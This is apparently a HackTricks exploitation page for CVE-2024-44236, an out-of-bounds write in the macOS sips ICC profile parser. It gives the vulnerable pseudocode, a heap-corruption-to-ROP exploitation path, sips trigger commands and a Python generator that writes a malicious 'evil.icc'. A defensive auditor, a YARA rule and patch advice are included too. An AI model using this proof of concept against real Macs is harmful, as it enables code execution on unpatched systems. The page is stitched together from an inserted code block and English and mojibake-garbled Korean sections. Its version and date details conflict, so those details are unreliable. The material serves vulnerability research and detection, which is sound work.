WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

A zero-write vulnerability in the ICC profile parser of the Apple macOS Scriptable Image Processing System (sips) (macOS 15.0.1, sips-307) lets an attacker corrupt heap metadata and escalate that primitive to full code execution. The bug lies in the handling of the offsetToCLUT field of lutAToBType (mAB ) and lutBToAType (mBA ) tags. When an attacker sets offsetToCLUT == tagDataSize, the parser zeroes 16 bytes past the end of the heap buffer. With heap spraying, the attacker can zero allocator structures or C++ pointers that are dereferenced later, yielding an arbitrary write-to-execute chain (CVE-2024-44236, CVSS 7.8).

Apple์€ macOS Sonoma 15.2 / Ventura 14.7.1์—์„œ ์ด ๋ฒ„๊ทธ๋ฅผ ํŒจ์น˜ํ–ˆ์Šต๋‹ˆ๋‹ค (2024๋…„ 10์›” 30์ผ). ๋‘ ๋ฒˆ์งธ ๋ณ€ํ˜• (CVE-2025-24185)์€ 2025๋…„ 4์›” 1์ผ macOS 15.5 ๋ฐ iOS/iPadOS 18.5์—์„œ ์ˆ˜์ •๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

Vulnerable code

// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT; with offsetToCLUT == tagDataSize
    // the loop starts one byte past the end of the tag's heap buffer
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0;            // no bounds check vs allocated size!
}
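The check the parser should have performed, shown as an added example that is not code from this page or from Apple: `vulnerable_check` reproduces the test in the pseudocode above, `hardened_check` is the corrected one, and `audit_profile` walks an ICC profile without trusting any offset and labels every mAB/mBA tag, which doubles as a triage tool for untrusted .icc files. It assumes the ICC.1 file layout (the 'acsp' signature at byte 36, the tag table at byte 128, offsetToCLUT at byte 24 of a lutAToBType/lutBToAType tag); the quick PoC generator further down this page uses a simplified layout (signature at byte 0, CLUT offset at byte 44 of the tag), so the module constants would need adjusting to audit its output. The sample profiles are constructed inline, and the auditor goes beyond the exact CVE case by also catching the partial overrun (offsetToCLUT below tagDataSize but fewer than 16 bytes remaining) and tag tables or tag data that overrun the file.

```python
#!/usr/bin/env python3
"""Added example: the offsetToCLUT bounds check sips-307 lacked, plus a small
auditor for untrusted .icc files. Not code from the page or from Apple.
Assumes the ICC.1 layout encoded in the constants below."""
import struct

ICC_SIGNATURE_OFFSET = 36   # 'acsp' occupies bytes 36..39 of the 128-byte header
TAG_TABLE_OFFSET = 128      # 4-byte tag count, then 12-byte entries (sig, offset, size)
LUT_TAG_TYPES = {b'mAB ', b'mBA '}
OFFSET_TO_CLUT_FIELD = 24   # position of offsetToCLUT inside an mAB/mBA tag
CLUT_HEADER_LEN = 16        # the 16 bytes the vulnerable loop zeroes


def vulnerable_check(offset_to_clut, tag_size):
    """The test from the sips-307 pseudocode: still passes when offset == size."""
    return offset_to_clut <= tag_size


def hardened_check(offset_to_clut, tag_size):
    """Accept only if all 16 CLUT-header bytes fit inside the tag.
    Subtracts instead of adding so a huge untrusted offset cannot wrap in C."""
    return offset_to_clut < tag_size and tag_size - offset_to_clut >= CLUT_HEADER_LEN


def audit_profile(data):
    """Return (signature, offset_to_clut, tag_size, verdict) per mAB/mBA tag,
    or a single structural finding, never using an offset before checking it."""
    sig_end = ICC_SIGNATURE_OFFSET + 4
    if len(data) < TAG_TABLE_OFFSET + 4 or data[ICC_SIGNATURE_OFFSET:sig_end] != b'acsp':
        return [(b'????', 0, len(data), 'not an ICC profile')]
    (count,) = struct.unpack_from('>I', data, TAG_TABLE_OFFSET)
    if count > (len(data) - TAG_TABLE_OFFSET - 4) // 12:
        return [(b'????', count, len(data), 'tag table overruns file')]
    findings = []
    for i in range(count):
        entry = TAG_TABLE_OFFSET + 4 + 12 * i
        sig, off, size = struct.unpack_from('>4sII', data, entry)
        if off > len(data) or size > len(data) - off:
            findings.append((sig, off, size, 'tag data overruns file'))
            continue
        tag = data[off:off + size]
        if tag[:4] not in LUT_TAG_TYPES or size < OFFSET_TO_CLUT_FIELD + 4:
            continue                      # not a LUT tag, or too short to hold the field
        (clut,) = struct.unpack_from('>I', tag, OFFSET_TO_CLUT_FIELD)
        if clut == 0:
            continue                      # zero means "no CLUT" in ICC.1
        if hardened_check(clut, size):
            verdict = 'ok'
        elif vulnerable_check(clut, size):
            verdict = 'CVE-2024-44236 pattern: passes the old check, 16-byte zeroing runs past the tag'
        else:
            verdict = 'rejected'
        findings.append((tag[:4], clut, size, verdict))
    return findings


def build_profile(clut_offset, tag_size=64):
    """Constructed sample: minimal header plus one A2B0 tag of type lutAToBType."""
    header = bytearray(TAG_TABLE_OFFSET)
    header[ICC_SIGNATURE_OFFSET:ICC_SIGNATURE_OFFSET + 4] = b'acsp'
    tag_data_offset = TAG_TABLE_OFFSET + 4 + 12     # one entry, then the tag data
    table = struct.pack('>I', 1) + struct.pack('>4sII', b'A2B0', tag_data_offset, tag_size)
    tag = bytearray(tag_size)
    tag[:4] = b'mAB '
    struct.pack_into('>I', tag, OFFSET_TO_CLUT_FIELD, clut_offset)
    return bytes(header) + table + bytes(tag)


if __name__ == '__main__':
    for clut in (32, 56, 64, 1000):       # in bounds, partial overrun, the CVE case, far out
        for finding in audit_profile(build_profile(clut)):
            print(finding)
```

To triage a real file, call `audit_profile(open(path, 'rb').read())`. The 56-byte case is the one worth remembering: it passes the old test and is not the exact CVE condition, yet the 16-byte zeroing still runs 8 bytes past the tag, which is why the corrected check has to account for the whole CLUT header and not only the starting offset.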

Exploitation Steps

  1. Build a malicious .icc profile
  • Set up a minimal ICC header (acsp) and add a single mAB (or mBA ) tag.
  • Lay out the tag table so that offsetToCLUT equals the tag size (tagDataSize).
  • Place attacker-controlled data immediately after the tag so that the 16 zero writes overlap allocator metadata.
  2. Trigger parsing with any sips operation that touches the profile
# verification path (no output file needed)
sips --verifyColor evil.icc
# or implicitly when converting an image that embeds the profile
sips -s format png payload.jpg --out out.png
  3. Heap metadata corruption ➜ arbitrary write ➜ ROP
  In Apple's default nano_zone allocator, the metadata for 16-byte slots sits immediately after the aligned 0x1000 slab. By positioning the profile's tag at the end of such a slab, the 16 zero writes overwrite meta->slot_B. On the next free, the tainted pointer is enqueued on the small free list, which lets the attacker allocate a fake object at an arbitrary address and overwrite a C++ vtable pointer used by sips, finally redirecting execution to a ROP chain stored in the malicious ICC buffer.

Quick PoC generator (Python 3)

#!/usr/bin/env python3
import struct

HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
# one tag entry directly after the header: (signature, offset, size).
# The tag data follows the 128-byte header, the 4-byte count and one
# 12-byte entry, so it starts at byte 144
TAGS = [(b'mAB ', 144, 52)]
profile  = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                      # tag payload (52 bytes)
mab[0:4] = b'mAB '                       # lutAToBType type signature
struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
profile += mab

with open('evil.icc', 'wb') as f:
    f.write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))

YARA detection rule

rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
        author      = "HackTricks"
    strings:
        $magic = { 61 63 73 70 }          // 'acsp'
        $mab   = { 6D 41 42 20 }          // 'mAB '
        $mba   = { 6D 42 41 20 }          // 'mBA '
    condition:
        // Layout matches the PoC above: signature at byte 0, tag table at byte 132,
        // offsetToCLUT at byte 44 of the tag data. Spec-conformant profiles carry
        // 'acsp' at byte 36 and offsetToCLUT at byte 24 of an mAB/mBA tag.
        $magic at 0 and
        for any i in (0 .. 10) :          // up to 10 tags
        (
            ($mab at 132 + 12*i or $mba at 132 + 12*i) and
            // ICC fields are big-endian: follow the entry's offset field to the
            // tag data, then compare offsetToCLUT with the entry's size field
            uint32be(uint32be(132 + 12*i + 4) + 44) == uint32be(132 + 12*i + 8)
        )
}

Impact

์กฐ์ž‘๋œ ICC ํ”„๋กœํŒŒ์ผ์„ ์—ด๊ฑฐ๋‚˜ ์ฒ˜๋ฆฌํ•˜๋ฉด ํ˜ธ์ถœํ•˜๋Š” ์‚ฌ์šฉ์ž์˜ ์ปจํ…์ŠคํŠธ์—์„œ ์›๊ฒฉ ์ž„์˜ ์ฝ”๋“œ ์‹คํ–‰์ด ๋ฐœ์ƒํ•˜๋ฉฐ (๋ฏธ๋ฆฌ๋ณด๊ธฐ, QuickLook, Safari ์ด๋ฏธ์ง€ ๋ Œ๋”๋ง, ๋ฉ”์ผ ์ฒจ๋ถ€ํŒŒ์ผ ๋“ฑ), ํ”„๋กœํŒŒ์ผ์ด ๊ทธ๋ ‡์ง€ ์•Š์€ ์ด๋ฏธ์ง€(PNG/JPEG/TIFF) ๋‚ด๋ถ€์— ํฌํ•จ๋  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— Gatekeeper๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.

Detection & Mitigation

  • ํŒจ์น˜! ํ˜ธ์ŠคํŠธ๊ฐ€ macOS โ‰ฅ 15.2 / 14.7.1 (๋˜๋Š” iOS/iPadOS โ‰ฅ 18.1)์„ ์‹คํ–‰ํ•˜๊ณ  ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค.
  • ์ด๋ฉ”์ผ ๊ฒŒ์ดํŠธ์›จ์ด ๋ฐ EDR ์†”๋ฃจ์…˜์— ์œ„์˜ YARA ๊ทœ์น™์„ ๋ฐฐํฌํ•˜์‹ญ์‹œ์˜ค.
  • ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ํŒŒ์ผ์„ ์ถ”๊ฐ€๋กœ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์ „์— exiftool -icc_profile= -overwrite_original <file>๋กœ ํฌํ•จ๋œ ICC ํ”„๋กœํŒŒ์ผ์„ ์ œ๊ฑฐํ•˜๊ฑฐ๋‚˜ ์ •๋ฆฌํ•˜์‹ญ์‹œ์˜ค.
  • ๋ฏธ์ง€์˜ ์ฝ˜ํ…์ธ ๋ฅผ ๋ถ„์„ํ•  ๋•Œ ์ƒŒ๋“œ๋ฐ•์Šคํ™”๋œ โ€œํˆฌ๋ช…์„ฑ ๋ฐ ํ˜„๋Œ€ํ™”โ€ VM ๋‚ด์—์„œ ๋ฏธ๋ฆฌ๋ณด๊ธฐ/QuickLook์„ ๊ฐ•ํ™”ํ•˜์‹ญ์‹œ์˜ค.
  • DFIR์˜ ๊ฒฝ์šฐ, ํ†ตํ•ฉ ๋กœ๊ทธ์—์„œ ์ƒŒ๋“œ๋ฐ•์Šคํ™”๋œ ์•ฑ์— ์˜ํ•ด sips --verifyColor ๋˜๋Š” ColorSync ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๋กœ๋“œ์˜ ์ตœ๊ทผ ์‹คํ–‰์„ ์ฐพ์œผ์‹ญ์‹œ์˜ค.

References

  • Trend Micro Zero Day Initiative advisory ZDI-24-1445 โ€“ โ€œApple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)โ€ https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
  • Apple security updates HT213981 โ€œAbout the security content of macOS Sonoma 15.2โ€ https://support.apple.com/en-us/HT213981
